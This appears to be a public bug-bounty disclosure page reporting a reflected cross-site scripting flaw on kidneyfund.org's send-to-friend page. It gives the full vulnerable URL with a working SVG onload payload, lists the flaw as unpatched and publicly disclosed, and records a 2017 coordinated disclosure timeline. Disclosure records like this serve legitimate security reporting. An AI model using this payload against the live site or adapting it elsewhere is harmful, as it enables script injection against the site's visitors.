logo
DATABASE RESOURCES PRICING ABOUT US

kidneyfund.org XSS vulnerability

Description

##### Vulnerable URL: http://www.kidneyfund.org/send-to-friend.jsp?pid=317400685&title;=--%3E%22%3E%20%3C%22%20%3E%20%22%20%3C%20%20%22%20.,%20%22%20%3C%20%3E%20%22%20%3C/script%3E%3C/title%3E%22%3E%3Csvg/onload=alert(/XSSPOSED/)%3E%3A%20Send%20to%20Friend%3A%20Send%20to%20Friend%3A%20Send%20to%20Friend%3A%20American%20Kidney%20Fund%20(AKF)%20-%20Reaching%20Out%2C%20Giving%20Hope%2C%20Improving%20Lives&url;=%2Fsend-to-friend.jsp%3Fpid%3D317400685%26title%3DSend%2Bto%2BFriend%253A%2BSend%2Bto%2BFriend%253A%2BSend%2Bto%2BFriend%253A%2BAmerican%2BKidney%2BFund%2B(AKF)%2B-%2BReaching%2BOut%252C%2BGiving%2BHope%252C%2BImproving%2BLives%26url%3D%252Fsend-to-friend.jsp%253Fpid%253D317400685%2526title%253DSend%252Bto%252BFriend%25253A%252BSend%252Bto%252BFriend%25253A%252BAmerican%252BKidney%252BFund%252B(AKF)%252B-%252BReaching%252BOut%25252C%252BGiving%252BHope%25252C%252BImproving%252BLives%2526url%253D%25252Fsend-to-friend.jsp%25253Fpid%25253D317400685%252526title%25253DSend%25252Bto%25252BFriend%2525253A%25252BAmerican%25252BKidney%25252BFund%25252B(AKF)%25252B-%25252BReaching%25252BOut%2525252C%25252BGiving%25252BHope%2525252C%25252BImproving%25252BLives%252526url%25253D%2525252Fsend-to-friend.jsp%2525253Fpid%2525253D72152482%25252526itemID%2525253D224899 ##### Details: Description| Value ---|--- Patched:| No Latest check for patch:| 30.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 270189 VIP website status:| No Check kidneyfund.org SSL connection:| (Grade: F) ##### Coordinated Disclosure Timeline: Description| Value ---|--- Vulnerability submitted via Open Bug Bounty| 17 January, 2017 03:27 GMT Vulnerability existence verified and confirmed| 17 January, 2017 09:05 GMT Generic security notifications sent to website owner| 17 January, 2017 09:05 GMT Notification sent to subscribers (without technical details)| 17 January, 2017 10:17 GMT Vulnerability details disclosed by researcher| 24 January, 2017 09:16 GMT